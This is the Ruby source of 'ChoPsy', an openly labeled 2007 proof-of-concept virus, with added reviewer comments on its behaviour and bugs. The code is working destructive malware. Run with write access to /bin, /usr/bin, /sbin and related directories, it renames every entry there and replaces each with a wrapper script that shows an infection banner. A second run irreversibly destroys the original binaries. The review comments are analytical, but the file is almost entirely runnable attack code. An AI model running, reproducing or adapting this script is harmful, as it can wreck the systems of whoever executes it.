#!/usr/bin/env ruby
# VIRUS - BE AWARE - VIRUS
#
# Name: ChoPsy
# Author: SkyOut
# Date: 2007
# Website: http://wired-security.net/
#
# Description: This "virus" is nothing more than a simple
# proof-of-concept, written out of boredom. It walks the
# directories where Unix/Linux systems normally keep their
# binaries and swaps each entry for a wrapper script that prints
# a message, counts down for a few seconds and then hands control
# to the renamed original.
#
# NOTE(review): despite the name, the code below never copies
# itself anywhere. The wrapper it writes only prints a banner and
# exec's the renamed binary; it carries no infection logic, so
# nothing propagates beyond the single run of this script. What it
# does do is rename every entry of the listed directories and
# overwrite the original names with Ruby scripts, which is
# destructive and, on a second run, irreversible (see replacecmd).
# Run it only in a disposable VM with no shared storage.
#
# WARNING: This code has barely been tested, and only under very
# controlled and limited conditions! If you execute it on your
# machine, neither the author nor the host of the author's site is
# responsible for ANY damage. Using it is your free choice, but
# YOU ARE RESPONSIBLE FOR EVERY ACTION!

# File.move below comes from ftools. NOTE(review): ftools is a
# Ruby 1.8-era library (superseded by fileutils); on a 1.9+
# interpreter this require is expected to raise LoadError, in which
# case nothing below runs. That is a useful triage fact: a LoadError
# in the log means the payload never executed.
require 'ftools'

# Replace one command with a wrapper script.
#
# Steps:
# -> Move the binary file "foo" to "foo_"
# -> Create a new file called "foo" (mode 0777, subject to umask)
# -> Write a Ruby script into it that prints a banner, counts
#    down, and finally exec's the original, now called "foo_",
#    with the wrapper's own arguments appended.
#
# cmdname - entry name inside dirpath (as returned by Dir#each)
# dirpath - directory the entry lives in
#
# NOTE(review): there is no check that "#{dirpath}/#{cmdname}" is a
# regular file, nor that "#{cmdname}_" does not already exist. On a
# second run the wrapper "foo" is itself renamed onto "foo_", which
# clobbers the real binary; the original is then gone for good.
# The handle `oldcmd` is never closed; the data presumably reaches
# disk only because the process exits shortly afterwards.
def replacecmd(cmdname, dirpath)
  File.move("#{dirpath}/#{cmdname}", "#{dirpath}/#{cmdname}_")
  oldcmd = File.open("#{dirpath}/#{cmdname}", File::WRONLY|File::TRUNC|File::CREAT, 0777)
  # The wrapper resolves "ruby" through env at run time. NOTE(review):
  # env and ruby themselves normally live in /usr/bin, which is in the
  # target list and not excluded; once they are wrapped, the shebang
  # points at a script whose own interpreter is a script, and the
  # kernel's interpreter-recursion limit is expected to make every
  # wrapper fail to start.
  oldcmd.puts "#!/usr/bin/env ruby\n"
  # Banner shown to the infected user (runtime strings; left verbatim)
  oldcmd.puts "puts \"\""
  oldcmd.puts "puts \"\\t\\tYour system has been infected with:\""
  oldcmd.puts "puts \"\\t\\t---> C - H - O - P - S - Y <---\""
  oldcmd.puts "puts \"\""
  oldcmd.puts "puts \"\\t\\t>>>> Author: SkyOut\""
  oldcmd.puts "puts \"\\t\\t>>>> Date: 2007\""
  oldcmd.puts "puts \"\\t\\t>>>> Website: core-security.net\""
  oldcmd.puts "puts \"\""
  # A countdown of three seconds will occur on every invocation
  oldcmd.puts "puts \"Take a moment of patience ...\""
  oldcmd.puts "puts \"Executing in ...\""
  oldcmd.puts "sleep 1"
  oldcmd.puts "puts \"3\""
  oldcmd.puts "sleep 1"
  oldcmd.puts "puts \"2\""
  oldcmd.puts "sleep 1"
  oldcmd.puts "puts \"1\""
  oldcmd.puts "sleep 1"
  oldcmd.puts "puts \"\""
  # Link back to the original binary. The "#\{...\}" escapes keep the
  # interpolation for the wrapper: it joins its own ARGV ($*) with
  # single spaces into $argslist and exec's "<dirpath>/<cmdname>_ <args>".
  # NOTE(review): the single-string form of exec is run through the
  # shell when the string contains metacharacters, and the arguments
  # are concatenated unquoted, so argument boundaries and quoting are
  # lost and anything the caller passes is interpreted by the shell.
  # Whoever can run the wrapper could run "<cmdname>_" directly, so
  # this is a correctness problem for the wrapped command rather than
  # a new privilege boundary.
  oldcmd.puts "for $args in $* do"
  oldcmd.puts "$argslist = \"#\{$argslist\}\" + \" \" + \"#\{$args\}\""
  oldcmd.puts "end"
  oldcmd.puts "exec \"#{dirpath}/#{cmdname}_ #\{$argslist\}\""
  oldcmd.puts "exit 0"
end

# Locations that will be scanned for entries to replace.
# NOTE(review): the Array.new is dead — it is overwritten on the next
# line. Left untouched; behaviour is identical either way.
$binary_dirs = Array.new
$binary_dirs = [ "/bin", "/usr/bin", "/usr/local/bin", "/sbin", "/usr/sbin", "/usr/local/sbin" ]

# Walk every listed directory. Globals ($dir, $binary_dirs) are used
# throughout, and `for` leaks its loop variable in any case.
for $dir in $binary_dirs do
  # Only act on real directories
  if File.directory?($dir) then
    # File.writable? on the directory is the only privilege gate:
    # on a stock system that typically means running as root.
    # Nothing else (ownership, mount flags, file type) is checked.
    if File.writable?($dir) then
      # Hand every entry to replacecmd. NOTE(review): the Dir handle is
      # never closed, and the directory is modified (new "foo_" entries
      # appear) while it is being iterated; whether those new entries
      # are visited depends on the filesystem, though the regex below
      # would skip them anyway.
      Dir.open($dir).each do |file|
        # Skip "." and "..", and anything matching /^\S+_/ — i.e. any
        # name containing "_" after at least one non-whitespace
        # character, not only names ending in "_". So an entry such as
        # "x86_64-linux-gnu-gcc" is skipped, while "_foo" is not.
        next if file =~ /^\S+_/ || file == "." || file == ".."
        # Subdirectories, symlinks and non-executables are not filtered
        # out here; replacecmd renames whatever the entry is.
        replacecmd(file, $dir)
      end
    end
  end
end

# Done
exit 0